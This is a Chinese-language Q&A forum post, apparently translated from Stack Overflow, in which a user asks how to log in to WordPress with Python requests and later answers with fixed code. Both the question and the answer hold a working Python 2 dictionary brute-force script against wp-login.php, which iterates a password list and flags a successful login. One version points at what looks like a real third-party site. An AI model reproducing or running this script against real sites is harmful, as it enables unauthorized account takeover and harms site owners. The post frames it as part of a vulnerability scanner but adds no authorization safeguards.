如何使用python请求登录wordpress？

Question

我一直在做一个叫网络地图的程序。它扫描网站的漏洞。但是我在暴力破解wordpress登录时遇到了一些麻烦。这是暴力破解登录的代码：

def brute_login(tgt, dictionary):
s = requests.Session()
pass_found = False

user = raw_input("User: ")
intent = 0
tgt = tgt+"/wp-login"
f = open(dictionary, 'r')
for word in f.readlines():
    password = word.strip('\n')
    intent+=1
    payload = {'log': user, 'pwd': password, 'redirect_to': 'TARGET_URL/wp-admin', 'testcookie': '1', 'wp-submit': 'Access'}
    print '[+] Trying with user: '+str(user)+' and password: '+str(password)+'\ttry: '+str(intent)
    s.post(tgt, data=payload)
    data = s.get("http://gerion.info/wp-admin").text
    if 'Escritorio' in data or 'Desktop' in data:
        print '[*] Password found: '+password
        pass_found = True
    else:
        pass

我希望你能帮助我，谢谢！

Answer 1

好了，我找到解决方案了。@payne问题是我无法登录wordpress管理页面。解决方案是让wordpress自己设置自己的cookies。这是最终的代码：

def brute_login(tgt, dictionary):

s = requests.Session()

s.get(tgt)

user = raw_input("User: ")
intent = 0
tgt = tgt + "/wp-login.php"

passwords = []
with open(dictionary, 'r') as f:
    passwords = f.read().rsplit('\n')

for password in passwords:
    intent += 1
    payload = {'log': user,'pwd': password}
    print'[+] Trying with user: %s and password: %s\ttry: %s' % (user, password, intent)

    data = s.post(tgt, data=payload)


    if not 'ERROR' in data.text:
        print '[*] Password found: '+password
        exit(0)